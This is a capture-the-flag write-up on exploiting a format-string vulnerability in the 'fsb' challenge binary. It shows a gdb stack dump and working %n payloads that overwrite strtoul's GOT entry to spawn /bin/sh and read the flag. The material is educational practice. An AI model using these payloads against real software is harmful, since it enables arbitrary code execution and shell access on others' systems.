# Self Referencing Stack - FSB


## Introspection

The `fsb` binary represents string format vulnerability which makes it, with great deal of certainty, fully exploitable.
There are few caveats, however.

1. controlled string format does not remain on the stack. It's stored in the `.data` section.
   This way, you can not control address to write to. Namely, you can not push the address of your choice on the stack,
   and overwrite it with data of your choice.

2. Remember, since this is standalone app, you can inject more data than it is possible at the first glance. 
   `argv`, `argc`, `env` for instance. These are removed almost correctly from the stack. 
   There is a trick to bypass the argv and envp 'erasing loop' introduced in `fsb()`.

3. You can not mount reliable attack on csu (C Start Up) due to  `alloca()` and randomness given as the argument.
   Thus, you can not predict offsets to csu ret addresses and so on. Or, if you can attack randomness? I do not know..

But. Hapilly, there are two gadgets that might help you.

```
    *pargv=0;
    *penvp=0;
```

Values pointed by those two are cleared, however pointers are not, which made this challenge called 'self referencing stack'.

Prior string format vulnerability is triggered, the stack looks as follows:

```
gdb-peda$ telescope 24
0000| 0xffcb5ec0 --> 0x804a100 ("FDSA\n")
0004| 0xffcb5ec4 --> 0x804a100 ("FDSA\n")
0008| 0xffcb5ec8 --> 0x64 ('d')
0012| 0xffcb5ecc --> 0x0 
0016| 0xffcb5ed0 --> 0x0 
0020| 0xffcb5ed4 --> 0x0 
0024| 0xffcb5ed8 --> 0x0 
0028| 0xffcb5edc --> 0x0 
0032| 0xffcb5ee0 --> 0x0 
0036| 0xffcb5ee4 --> 0x8048870 ("/bin/sh")
0040| 0xffcb5ee8 --> 0x0 
0044| 0xffcb5eec --> 0x0 
0048| 0xffcb5ef0 --> 0xffcb815c --> 0x0 
0052| 0xffcb5ef4 --> 0xffcb8fb9 --> 0x6f682f00 ('')
0056| 0xffcb5ef8 --> 0xffcb5f10 --> 0x0 
0060| 0xffcb5efc --> 0xffcb5f14 --> 0x0 
0064| 0xffcb5f00 --> 0x0 
0068| 0xffcb5f04 --> 0x0 
0072| 0xffcb5f08 --> 0xffcb7fa8 --> 0x0 
0076| 0xffcb5f0c --> 0x8048791 (<main+178>:	mov    eax,0x0)
0080| 0xffcb5f10 --> 0x0 
0084| 0xffcb5f14 --> 0x0 
0088| 0xffcb5f18 --> 0x0 
0092| 0xffcb5f1c --> 0x0 
```

At address `0xffcb5ef8` you can find `0xffcb5f10` which is an address to the stack itself.
You can use this in your string format vulnerability to store arbitrary value at esp+0x80.

Remember, this is locally hosted challenge, meaning you can redirect this huge output printed by `vfprintf` directly to `/dev/null`.
I do not see this approach working when the challenge is hosted remotely.

## Exploit

I've chosen to overwrite `strtoul@got.plt` address, so first call to strtoul won't go through `dlfixup` routines, instead - strtroul call will jump to `fsb+375` - execve(/bin/sh). There are many other solutions, feel free to pick any other.

```
fsb@ubuntu:~$ ./fsb > /dev/null
%c%c%c%c%c%c%c%c%c%c%c%c%c%134520851c%n
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%134514328c%n
strtoul is no longer strtoul holmes
fsb
(>&2 cat flag)
Have you ever saw an example of utilizing [n] format character?? :(
```
